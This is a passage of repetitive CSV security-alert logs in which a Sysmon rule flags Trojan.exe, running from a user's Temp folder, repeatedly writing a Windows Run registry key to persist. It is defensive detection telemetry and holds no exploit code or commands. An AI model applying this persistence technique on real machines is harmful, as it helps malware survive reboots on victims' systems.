HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:35.523"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:48.695",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:34.245 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:34.253203700Z"",""eventRecordID"":""1312"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:34.245\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:34.245"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:48.376",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:33.200 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:33.253704600Z"",""eventRecordID"":""1311"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:33.200\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:33.200"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:48.059",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:32.155 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:32.172865800Z"",""eventRecordID"":""1310"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:32.155\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:32.155"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:47.933",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:31.135 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:31.168379100Z"",""eventRecordID"":""1309"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:31.135\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:31.135"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:45.352",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:30.122 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:30.141135700Z"",""eventRecordID"":""1308"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:30.122\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:30.122"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:41.289",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:29.116 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:29.125066800Z"",""eventRecordID"":""1307"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:29.116\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:29.116"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:41.242",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:28.106 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:28.127479100Z"",""eventRecordID"":""1305"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:28.106\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:28.106"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:40.264",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:27.091 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:27.093669700Z"",""eventRecordID"":""1304"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:27.091\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:27.091"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:38.263",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:26.076 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:26.080985700Z"",""eventRecordID"":""1303"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:26.076\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:26.076"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:38.249",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:25.044 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:25.081166300Z"",""eventRecordID"":""1302"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:25.044\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:25.044"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:36.561",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:24.029 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:24.076048400Z"",""eventRecordID"":""1301"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:24.029\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
